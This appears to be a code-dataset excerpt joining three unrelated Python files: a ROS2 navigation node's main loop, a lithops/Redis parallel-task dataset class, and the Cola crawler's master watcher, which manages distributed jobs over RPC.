constants.ActionValues.DEFAULT,
)
self.action_publisher.publish(msg)
# Destroy the ROS Node running in another thread as well.
self.destroy_node()
rclpy.shutdown()
def main(args=None):
rclpy.init(args=args)
qos = QoSProfile(
reliability=QoSReliabilityPolicy.RMW_QOS_POLICY_RELIABILITY_BEST_EFFORT,
depth=1,
history=QoSHistoryPolicy.RMW_QOS_POLICY_HISTORY_KEEP_LAST,
)
try:
deepdriver_navigation_node = TrafficNavigationNode(qos)
executor = MultiThreadedExecutor()
def signal_handler(signum, frame):
"""Callback function to handle registered signal handler
to join and stop executing running thread created.
Args:
signum: The signal number.
frame: the current stack frame (None or a frame object).
"""
deepdriver_navigation_node.get_logger().info("Signal Handler initiated")
deepdriver_navigation_node.thread_shutdown()
deepdriver_navigation_node.wait_for_thread()
# Register SIGINT handler
signal.signal(signal.SIGINT, signal_handler)
rclpy.spin(deepdriver_navigation_node, executor)
except Exception as ex:
deepdriver_navigation_node.get_logger().error(
f"Exception in TrafficNavigationNode: {ex}"
)
deepdriver_navigation_node.destroy_node()
rclpy.shutdown()
# Destroy the node explicitly
# (optional - otherwise it will be done automatically
# when the garbage collector destroys the node object)
deepdriver_navigation_node.destroy_node()
rclpy.shutdown()
if __name__ == "__main__":
main()
|
datasetbase.py | import redis
import itertools
import hashlib
import cloudpickle
import logging
import threading
import msgpack
import lithops
from lithopsext import utils
from .core import _task_worker
logger = logging.getLogger('lithops')
DEBUG = True
class DatasetBase:
def __init__(self):
self._partitions = []
self._lithops_storage = lithops.storage.Storage()
self._lithops_executor = lithops.FunctionExecutor()
self._group_id = '-'.join(['lithops', self._lithops_executor.executor_id, 'group'])
self._red = redis.Redis(**utils.extract_redis_config())
self._pool_active = False
self._task_counter = itertools.count(0)
self._worker_futures = []
assert self._red.ping()
@property
def _num_partitions(self):
return len(self._partitions)
def parallel_apply(self, f, *args, **kwargs):
task_id = self._group_id + '-' + str(next(self._task_counter)).zfill(3)
func_pickle = cloudpickle.dumps(f)
func_pickle_hash = hashlib.md5(func_pickle).hexdigest()
func_key = '-'.join(['func', f.__name__, func_pickle_hash])
if not self._red.hexists(self._group_id, func_key):
self._red.hset(self._group_id, func_key, func_pickle)
args_pickle = cloudpickle.dumps({'args': args, 'kwargs': kwargs})
args_key = 'args-{}'.format(task_id)
self._red.hset(self._group_id, args_key, args_pickle)
task = {'action': 'task',
'task_id': task_id,
'group_size': self._num_partitions,
'task_join_bl': '{}-bl'.format(task_id),
'task_join_counter': '{}-cnt'.format(task_id),
'func_key': func_key,
'args_key': args_key}
msg = msgpack.packb(task)
logger.debug('Submit task {} from host'.format(task_id))
self._red.publish(self._group_id + '_chan', msg)
self._red.lpush(self._group_id + '_tasklog', msg)
if not self._pool_active:
if not DEBUG:
logger.debug('Using lithops')
self._worker_futures = self._lithops_executor.map(_task_worker, self._shards,
extra_args={'group_id': self._group_id})
else:
logger.debug('Using threading')
self._worker_futures = []
for i, shard in enumerate(self._partitions):
thread = threading.Thread(target=_task_worker, args=(i, shard, self._group_id))
thread.start()
self._worker_futures.append(thread)
self._pool_active = True
results = None
wait_loop = True
logger.debug('Host for task {} completion on list {}...'.format(task_id, task['task_join_bl']))
while wait_loop:
res = self._red.blpop(task['task_join_bl'], timeout=5)
logger.debug('Time out reached, trying to get functions results...')
if res is None:
if not DEBUG:
worker_status = self._lithops_executor.get_result(fs=self._worker_futures)
# workers_done = all([fut.ready for fut in self._worker_futures])
# print(workers_done)
# if workers_done:
# worker_status = self._lithops_executor.get_result(fs=self._worker_futures)
else:
workers_done = all([p.is_alive() for p in self._worker_futures])
if workers_done:
worker_status = [p.join() for p in self._worker_futures]
else:
logger.debug('Task {} complete'.format(task_id))
results_pickle = self._red.hgetall(task['task_id']).values()
results = [cloudpickle.loads(res) for res in results_pickle]
# print(results)
wait_loop = False
print(results)
return results[0]
class PartitionBase:
@property
def key(self):
return None
def get(self):
pass
|
watcher.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Copyright (c) 2013 Qin Xuye <qin@qinxuye.me>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Created on 2013-6-5
@author: Chine
'''
import time
import threading
import os
import subprocess
import shutil
from cola.core.rpc import client_call, ColaRPCServer, \
FileTransportServer, FileTransportClient
from cola.core.zip import ZipHandler
from cola.core.utils import get_ip, get_ips, \
import_job, root_dir
from cola.core.config import main_conf
RUNNING, HANGUP, STOPPED = range(3)
CONTINOUS_HEARTBEAT = 90
HEARTBEAT_INTERVAL = 20
HEARTBEAT_CHECK_INTERVAL = 3*HEARTBEAT_INTERVAL
class MasterWatcherRunning(Exception): pass
class MasterJobInfo(object):
def __init__(self, port, nodes_ip_addresses, worker_port, popen=None):
self.job_master = '%s:%s' % (get_ip(), port)
self.nodes = [
'%s:%s'%(node_ip, worker_port) for node_ip in nodes_ip_addresses
]
self.worker_port = worker_port
self.popen = None
def add_worker(self, node):
if ':' not in node:
node = '%s:%s' % (node, self.worker_port)
self.nodes.append(node)
client_call(self.job_master, 'add_node', node, ignore=True)
def remove_worker(self, node):
if ':' not in node:
node = '%s:%s' % (node, self.worker_port)
self.nodes.remove(node)
client_call(self.job_master, 'remove_node', node, ignore=True)
def has_worker(self, node):
if ':' not in node:
node = '%s:%s' % (node, self.worker_port)
return node in self.nodes
class WatcherInfo(object):
def __init__(self, watcher):
self.status = RUNNING
self.continous_register = 1
self.last_update = int(time.time())
def register(self):
self.continous_register += 1
self.last_update = int(time.time())
class MasterWatcher(object):
def __init__(self, root, zip_dir, job_dir,
ip_address=None, data_path=None, force=False):
self.root = root
self.zip_dir = zip_dir
self.job_dir = job_dir
self.data_path = data_path
self.force = force
self.nodes_watchers = {}
self.running_jobs = {}
self.black_list = []
if ip_address is None:
ip_address = get_ip()
else:
choices_ips = get_ips()
if ip_address not in choices_ips:
raise ValueError('IP address must be one of (%s)' % ','.join(choices_ips))
self.ip_address = ip_address
self.port = main_conf.master.port
self.stopped = False
self.check(force=force)
self.init_rpc_server()
self.rpc_server.register_function(self.register_watcher_heartbeat,
'register_heartbeat')
self.rpc_server.register_function(self.stop, 'stop')
self.rpc_server.register_function(self.list_jobs, 'list_jobs')
self.rpc_server.register_function(self.start_job, 'start_job')
self.rpc_server.register_function(self.stop_job, 'stop_job')
self.rpc_server.register_function(self.finish_job, 'finish_job')
self.rpc_server.register_function(self.clear_job, 'clear_job')
self.rpc_server.register_function(self.list_job_dirs, 'list_job_dirs')
self.rpc_server.register_function(self.list_workers, 'list_workers')
self.set_receiver(zip_dir)
def init_rpc_server(self):
rpc_server = ColaRPCServer((self.ip_address, self.port))
thd = threading.Thread(target=rpc_server.serve_forever)
thd.setDaemon(True)
thd.start()
self.rpc_server = rpc_server
def check(self, force=False):
if not self.check_env(force=force):
raise MasterWatcherRunning('There has been a running master watcher.')
def check_env(self, force=False):
lock_f = os.path.join(self.root, 'lock')
if os.path.exists(lock_f) and not force:
return False
if os.path.exists(lock_f) and force:
try:
os.remove(lock_f)
except:
return False
open(lock_f, 'w').close()
return True
def finish(self):
lock_f = os.path.join(self.root, 'lock')
if os.path.exists(lock_f):
os.remove(lock_f)
self.rpc_server.shutdown()
self.stopped = True
def register_watcher_heartbeat(self, node_watcher):
if node_watcher not in self.nodes_watchers:
watcher_info = WatcherInfo(node_watcher)
self.nodes_watchers[node_watcher] = watcher_info
else:
watcher_info = self.nodes_watchers[node_watcher]
watcher_info.register()
def start_check_worker(self):
def _check():
for watcher, watcher_info in self.nodes_watchers.iteritems():
ip_addr = watcher.split(':')[0]
# if loose connection
if int(time.time()) - watcher_info.last_update \
> HEARTBEAT_CHECK_INTERVAL:
watcher_info.continous_register = 0
if watcher_info.status == RUNNING:
watcher_info.status = HANGUP
elif watcher_info.status == HANGUP:
watcher_info.status = STOPPED
self.black_list.append(watcher)
for job_info in self.running_jobs.values():
if job_info.has_worker(ip_addr):
job_info.remove_worker(ip_addr)
# if continously connect for more than 10 min
elif watcher_info.continous_register >= CONTINOUS_HEARTBEAT:
if watcher_info.status != RUNNING:
watcher_info.status = RUNNING
if watcher in self.black_list:
self.black_list.remove(watcher)
for job_info in self.running_jobs.values():
if not job_info.has_worker(ip_addr):
job_info.add_worker(ip_addr)
def _start():
while not self.stopped:
_check()
time.sleep(HEARTBEAT_CHECK_INTERVAL)
thread = threading.Thread(target=_start)
thread.setDaemon(True)
thread.start()
return thread
def list_workers(self):
return self.nodes_watchers.keys()
def list_jobs(self):
return self.running_jobs.keys()
def list_job_dirs(self):
return os.listdir(self.job_dir)
def set_receiver(self, base_dir):
serv = FileTransportServer(self.rpc_server, base_dir)
return serv
def start_job(self, zip_filename, uncompress=True, client=None):
if uncompress:
zip_file = os.path.join(self.zip_dir, zip_filename)
# transfer zip file to workers
for watcher in self.nodes_watchers:
if watcher.split(':')[0] == self.ip_address:
continue
file_trans_client = FileTransportClient(watcher, zip_file)
file_trans_client.send_file()
job_dir = ZipHandler.uncompress(zip_file, self.job_dir)
else:
job_dir = os.path.join(self.job_dir, zip_filename.rsplit('.', 1)[0])
job = import_job(job_dir)
worker_port = job.context.job.port
port = job.context.job.master_port
nodes = [watcher.split(':')[0] for watcher in self.nodes_watchers]
if len(nodes) > 0:
info = MasterJobInfo(port, nodes, worker_port)
self.running_jobs[job.real_name] = info
dirname = os.path.dirname(os.path.abspath(__file__))
f = os.path.join(dirname, 'loader.py')
workers = ['%s:%s'%(node, worker_port) for node in nodes]
cmds = ['python', f, '-j', job_dir, '-i', self.ip_address,
'-n', ' '.join(workers)]
if self.data_path is not None:
cmds.extend(['-d', self.data_path])
if self.force:
cmds.append('-f')
if client is not None:
cmds.extend(['-c', client])
popen = subprocess.Popen(cmds)
info.popen = popen
# call workers to start job
for worker_watcher in self.nodes_watchers:
client_call(worker_watcher, 'start_job', zip_filename, uncompress, ignore=True)
def stop_job(self, job_real_name):
if job_real_name not in self.running_jobs:
return False
job_info = self.running_jobs[job_real_name]
try:
client_call(job_info.job_master, 'stop', ignore=True)
finally:
for watcher in self.nodes_watchers.keys():
client_call(watcher, 'kill', job_real_name, ignore=True)
self.kill(job_real_name)
return True
def finish_job(self, job_real_name):
del self.running_jobs[job_real_name]
def clear_job(self, job_name):
job_name = job_name.replace(' ', '_')
path = os.path.join(self.job_dir, job_name)
shutil.rmtree(path)
for watcher in self.nodes_watchers:
client_call(watcher, 'clear_job', ignore=True)
def stop(self):
# stop all jobs
for job_name in self.running_jobs.keys():
self.stop_job(job_name)
for watcher in self.nodes_watchers:
client_call(watcher, 'stop', ignore=True)
self.finish()
def kill(self, job_realname):
if job_realname in self.running_jobs.keys():
self.running_jobs[job_realname].popen.kill()
def run(self):
thread = self.start_check_worker()
thread.join()
def __enter__(self):
return self
def __exit__(self, type_, value, traceback):
self.finish()
def makedirs(path):
if not os.path.exists(path):
os.makedirs(path)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser('Cola master watcher')
parser.add_argument('-d', '--data', metavar='data root directory', nargs='?',
default=None, const=None,
help='root directory to put data')
parser.add_argument('-i', '--ip', metavar='IP address', nargs='?',
default=None, const=None,
help='IP Address to start')
parser.add_argument('-f', '--force', metavar='force start', nargs='?',
default=False, const=True, type=bool)
args = parser.parse_args()
data_path = args.data
if data_path is None:
data_path = os.path.join(root_dir(), 'data')
ip = args.ip
force = args.force
root = os.path.join(data_path, 'master', 'watcher')
zip_dir = os.path.join(data_path, 'zip')
job_dir = os.path.join(data_path, 'jobs')
for dir_ in (root, zip_dir, job_dir):
makedirs(dir_)
with MasterWatcher(root, zip_dir, job_dir, ip_address=ip,
data_path=data_path, force=force) \
as master_watcher:
master_watcher.run() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.